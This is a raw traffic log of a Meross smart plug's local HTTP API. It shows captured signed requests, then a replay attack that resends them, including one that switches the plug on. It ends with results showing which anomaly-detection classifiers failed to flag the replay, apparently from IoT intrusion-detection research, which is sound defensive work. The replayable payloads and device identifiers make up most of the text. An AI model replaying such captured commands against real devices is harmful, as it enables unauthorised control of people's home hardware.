POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 310
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"5a32f7032661bc0e2dead723e4ec037a","method":"GET","namespace":"Appliance.System.All","payloadVersion":1,"sign":"0ce0ec3adc12d283f3d3745f4e2998b6","timestamp":1694115650,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"5a32f7032661bc0e2dead723e4ec037a","namespace":"Appliance.System.All","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1694115649,"timestampMs":20,"sign":"c7a226122c28f7b879be9d0e5fa5272b"},"payload":{"all":{"system":{"hardware":{"type":"mss310h","subType":"it","version":"3.0.0","chipType":"mt7682","uuid":"21012131127760290d3548e1e947c6ee","macAddress":"48:e1:e9:47:c6:ee"},"firmware":{"version":"3.1.1","compileTime":"2020/02/26 09:43:54 GMT +08:00","wifiMac":"2c:33:58:b8:15:96","innerIp":"10.0.0.109","server":"mqtt-eu-3.meross.com","port":443,"userId":2884081},"time":{"timestamp":1694115649,"timezone":"Europe/Rome","timeRule":[[1679792400,7200,1],[1698541200,3600,0],[1711846800,7200,1],[1729990800,3600,0],[1743296400,7200,1],[1761440400,3600,0],[1774746000,7200,1],[1792890000,3600,0],[1806195600,7200,1],[1824944400,3600,0],[1837645200,7200,1],[1856394000,3600,0],[1869094800,7200,1],[1887843600,3600,0],[1901149200,7200,1],[1919293200,3600,0],[1932598800,7200,1],[1950742800,3600,0],[1964048400,7200,1],[1982797200,3600,0]]},"online":{"status":1}},"digest":{"togglex":[{"channel":0,"onoff":0,"lmTime":1694115625}],"triggerx":[],"timerx":[]}}}}

POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 313
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"cb583c592fd984f5c7a3f45de06c325f","method":"GET","namespace":"Appliance.System.Online","payloadVersion":1,"sign":"1de23698e7be29120d4a9ab911572a58","timestamp":1694115650,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"cb583c592fd984f5c7a3f45de06c325f","namespace":"Appliance.System.Online","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1694115650,"timestampMs":108,"sign":"1de23698e7be29120d4a9ab911572a58"},"payload":{"online":{"status":1}}}

POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 348
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"43f1deee1717cff322338d83680e20da","method":"SET","namespace":"Appliance.Control.ToggleX","payloadVersion":1,"sign":"8fe4ed7f2c73df854f12f7515514e569","timestamp":1694115658,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{"togglex":{"channel":0,"onoff":1}}}
HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"43f1deee1717cff322338d83680e20da","namespace":"Appliance.Control.ToggleX","method":"SETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1694115657,"timestampMs":779,"sign":"87bef3f32191ae55428108a682650b55"},"payload":{}}

START REPLAY ATTACK
#######################################################################################
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 348
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"43f1deee1717cff322338d83680e20da","method":"SET","namespace":"Appliance.Control.ToggleX","payloadVersion":1,"sign":"8fe4ed7f2c73df854f12f7515514e569","timestamp":1694115658,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{"togglex":{"channel":0,"onoff":1}}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"43f1deee1717cff322338d83680e20da","namespace":"Appliance.Control.ToggleX","method":"SETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1694115802,"timestampMs":735,"sign":"e7cb9845e0978af47f603a72844dc907"},"payload":{}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 313
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"cb583c592fd984f5c7a3f45de06c325f","method":"GET","namespace":"Appliance.System.Online","payloadVersion":1,"sign":"1de23698e7be29120d4a9ab911572a58","timestamp":1694115650,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"cb583c592fd984f5c7a3f45de06c325f","namespace":"Appliance.System.Online","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1694115802,"timestampMs":743,"sign":"6e32bab983b78b514531e8f0474710f1"},"payload":{"online":{"status":1}}}

****************************************************************
sent payload=POST /config HTTP/1.1
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 310
Host: 10.0.0.109
Accept-Encoding: gzip
User-Agent: okhttp/3.12.0

{"header":{"from":"http://10.0.0.109/config","messageId":"5a32f7032661bc0e2dead723e4ec037a","method":"GET","namespace":"Appliance.System.All","payloadVersion":1,"sign":"0ce0ec3adc12d283f3d3745f4e2998b6","timestamp":1694115650,"triggerSrc":"AndroidLocal","uuid":"21012131127760290d3548e1e947c6ee"},"payload":{}}
****************************************************************
received payload=HTTP/1.1 200 OK
Content-Type: application/json

{"header":{"messageId":"5a32f7032661bc0e2dead723e4ec037a","namespace":"Appliance.System.All","method":"GETACK","payloadVersion":1,"from":"/appliance/21012131127760290d3548e1e947c6ee/publish","timestamp":1694115802,"timestampMs":751,"sign":"45e1dbecc551aa3ed5159b5efda7b6b8"},"payload":{"all":{"system":{"hardware":{"type":"mss310h","subType":"it","version":"3.0.0","chipType":"mt7682","uuid":"21012131127760290d3548e1e947c6ee","macAddress":"48:e1:e9:47:c6:ee"},"firmware":{"version":"3.1.1","compileTime":"2020/02/26 09:43:54 GMT +08:00","wifiMac":"2c:33:58:b8:15:96","innerIp":"10.0.0.109","server":"mqtt-eu-3.meross.com","port":443,"userId":2884081},"time":{"timestamp":1694115802,"timezone":"Europe/Rome","timeRule":[[1679792400,7200,1],[1698541200,3600,0],[1711846800,7200,1],[1729990800,3600,0],[1743296400,7200,1],[1761440400,3600,0],[1774746000,7200,1],[1792890000,3600,0],[1806195600,7200,1],[1824944400,3600,0],[1837645200,7200,1],[1856394000,3600,0],[1869094800,7200,1],[1887843600,3600,0],[1901149200,7200,1],[1919293200,3600,0],[1932598800,7200,1],[1950742800,3600,0],[1964048400,7200,1],[1982797200,3600,0]]},"online":{"status":1}},"digest":{"togglex":[{"channel":0,"onoff":1,"lmTime":1694115802}],"triggerx":[],"timerx":[]}}}}

****************************************************************
REPLAY ATTACK NOT SUCCESSFUL WITH CLF=OneClassSVM(gamma='auto', nu=0.001)
REPLAY ATTACK SUCCESSFUL WITH CLF=IsolationForest(contamination=0.01)
REPLAY ATTACK SUCCESSFUL WITH CLF=EllipticEnvelope(contamination=0.01)
REPLAY ATTACK SUCCESSFUL WITH CLF=LocalOutlierFactor(contamination=0.01, novelty=True)
REPLAY ATTACK SUCCESSFUL WITH CLF=CustomClassifier()
END REPLAY ATTACK
